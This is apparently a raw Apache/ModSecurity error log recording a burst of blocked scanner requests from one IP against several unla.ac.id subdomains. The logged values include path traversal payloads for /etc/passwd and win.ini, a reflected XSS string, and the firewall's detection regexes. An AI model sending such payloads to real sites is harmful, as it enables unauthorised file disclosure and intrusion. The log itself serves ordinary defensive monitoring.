[Tue Aug 29 11:45:16.433607 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhvjWMAAAAs"]
[Tue Aug 29 11:45:17.360244 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhhcwsAAAAd"]
[Tue Aug 29 11:45:17.370535 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhlz4QAAAAi"]
[Tue Aug 29 11:45:17.376766 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAh4DYMAAAA2"]
[Tue Aug 29 11:45:17.390052 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAfSWjEAAAAB"]
[Tue Aug 29 11:45:17.393654 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhlz4UAAAAi"]
[Tue Aug 29 11:45:17.408062 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhZReEAAAAG"]
[Tue Aug 29 11:45:17.413986 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAgzyTsAAAAF"]
[Tue Aug 29 11:45:17.414988 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhxwmMAAAAv"]
[Tue Aug 29 11:45:17.419420 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhmFREAAAAj"]
[Tue Aug 29 11:45:17.420851 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAfg78AAAAAe"]
[Tue Aug 29 11:45:18.362165 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133sCo-f0AAAfGaiYAAAAT"]
[Tue Aug 29 11:45:18.413895 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133sCo-f0AAAe3@KYAAAAA"]
[Tue Aug 29 11:45:18.419669 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133sCo-f0AAAeAW94AAAAu"]
[Tue Aug 29 11:45:19.367996 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhtjc0AAAAq"]
[Tue Aug 29 11:45:19.375884 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAeAW98AAAAu"]
[Tue Aug 29 11:45:19.384658 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAfGaikAAAAT"]
[Tue Aug 29 11:45:19.385483 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhxwmUAAAAv"]
[Tue Aug 29 11:45:19.396405 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhoHL8AAAAl"]
[Tue Aug 29 11:45:19.401131 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO1338Co-f0AAARphK0AAAAU"]
[Tue Aug 29 11:45:19.415102 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhlz4gAAAAi"]
[Tue Aug 29 11:45:20.372121 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO134MCo-f0AAAfg78UAAAAe"]
[Tue Aug 29 11:45:20.383479 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAARphK4AAAAU"]
[Tue Aug 29 11:45:20.401093 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhzvaoAAAAx"]
[Tue Aug 29 11:45:20.403037 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhuix0AAAAr"]
[Tue Aug 29 11:45:20.408559 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhoHMEAAAAl"]
[Tue Aug 29 11:45:20.411735 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAh3f7gAAAA1"]
[Tue Aug 29 11:45:20.413326 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO134MCo-f0AAAhgoHcAAAAb"]
[Tue Aug 29 11:45:21.424341 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134cCo-f0AAAdQ3zcAAAAV"]
[Tue Aug 29 11:45:23.358757 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAh13wEAAAAz"]
[Tue Aug 29 11:45:23.361318 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhuiyEAAAAr"]
[Tue Aug 29 11:45:23.365217 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhkLgAAAAAh"]
[Tue Aug 29 11:45:23.370514 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhxwm8AAAAv"]
